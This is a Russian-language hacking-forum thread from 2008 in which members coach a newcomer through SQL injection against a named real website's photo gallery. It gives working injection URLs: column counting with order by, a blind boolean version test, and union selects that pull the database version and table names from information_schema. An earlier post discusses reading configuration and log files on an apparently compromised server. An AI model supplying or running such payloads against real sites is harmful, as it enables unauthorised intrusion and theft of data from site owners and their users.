HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2371  
Старый 16.06.2008, 00:02
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Цитата:
Сообщение от Constantine  
Велемир в закладки куда-нибудь положи https://forum.antichat.ru/thread22832.html
Ппц пасип те за статью Ж))))))))))),оч помогла)).Встали терь такие вопросы.К моему удивлению,.bash_history файла не оказалось ни у кого из юзеров (.В конфиге,лежащему по пути etc/httpd/conf/httpd.conf,нашёл одну директиву - AccessFileName .htaccess.Походу не прочитать мне буит их(.По идее,такая же директива нужна для каждого файла?).тобишь должна быть строка ещё AccessFileName .hpasswd.Хм...Есть ещё какойто конфиг,лежащий по адресу

etc/httpd/conf/vhosts/Vhosts_ispconfig.conf.Тут много интересных директив,но про них в той статье не сказано было.Есть догадки...но что это конкретно за фаил кто-нибудь может пояснить ?)

Да,и вот ещё что. В директивах ErrorLog указаны пути до лог файлов.Некоторые пути дают ошибку,хотя всё верно вводил.Некоторые пустые,но существуют 100%)).*Настоящего* лог-файла с даными ещё не встречал).Такое ощущение, что отключен лог ошибок вапще,ибо пхп.ини не прочитать =_____=

Последний раз редактировалось Велемир; 16.06.2008 в 00:09..
 
Ответить с цитированием

Помогите пожалуйста!
  #2372  
Старый 16.06.2008, 00:15
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами: 9479722

Репутация: -1
Question Помогите пожалуйста!

Есть такой сайт http://www.modvlad.ru

Как то на него залез и решил проверить на инъ...ю
нашел ссылку http://www.modvlad.ru/photo/?g=37
проверил http://www.modvlad.ru/photo/?g=37' выдало:


Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/u65735/modvlad.ru/www/gallery/engine/gallery.php on line 39

попробовал обратиться к базе не выходит подскажите плиз кто знает что дальше делать??
 
Ответить с цитированием

  #2373  
Старый 16.06.2008, 00:23
Sharingan
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
С нами: 10009826

Репутация: 435
По умолчанию

читать статьи про sql inj...
вообще подбирай столбцы через ордер бай
 
Ответить с цитированием

  #2374  
Старый 16.06.2008, 00:37
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами: 9479722

Репутация: -1
По умолчанию

попробовал:
http://www.modvlad.ru/photo/?g=-1+order+by+100/*
и от 1 до 100

ни каких продвижений ошибка та же
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/u65735/modvlad.ru/www/gallery/engine/gallery.php on line 39
что делать дальше??

Последний раз редактировалось JoN.SmiT; 16.06.2008 в 00:42..
 
Ответить с цитированием

  #2375  
Старый 16.06.2008, 00:44
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами: 9762146

Репутация: 1174
По умолчанию

полей 6, а скуля слепая
Код:
http://modvlad.ru/photo/?g=33+and+if(substring((select+version()),1,1)=5,1,0)
 
Ответить с цитированием

  #2376  
Старый 16.06.2008, 00:49
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

http://www.modvlad.ru/photo/?g=37+union+select+table_name,2,3,4,5,6+from+infor mation_schema.tables+limit+38,1/*

38 Таблиц.Проще поискать скрипт с выводом =_________=.У меня тоже такое было.
 
Ответить с цитированием

  #2377  
Старый 16.06.2008, 00:59
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами: 9479722

Репутация: -1
По умолчанию

А что мне делать со слипой скуляй?

и где взять скрипт с выводом если не секрет?
 
Ответить с цитированием

  #2378  
Старый 16.06.2008, 01:00
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами: 10172486

Репутация: 874
По умолчанию

Не слепая!!!!
Открой исходный код страницы и поищи поля 3,4,5,6. Вывод в них
Вот пример
http://www.modvlad.ru/photo/?g=-1+union+select+111,222,version(),444,555,666/*
ищем в коде 444, и рядом видим версию 5.0.45-log
 
Ответить с цитированием

  #2379  
Старый 16.06.2008, 01:08
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами: 9479722

Репутация: -1
По умолчанию

ага нашел! А как теперь сформировать запрос на вывод таблицы?
 
Ответить с цитированием

  #2380  
Старый 16.06.2008, 01:10
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами: 10485026

Репутация: 1879


По умолчанию

Запрос из базы только Лимитом(!!!) Попробовал вывести всё... опера всю оперативу скушала...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.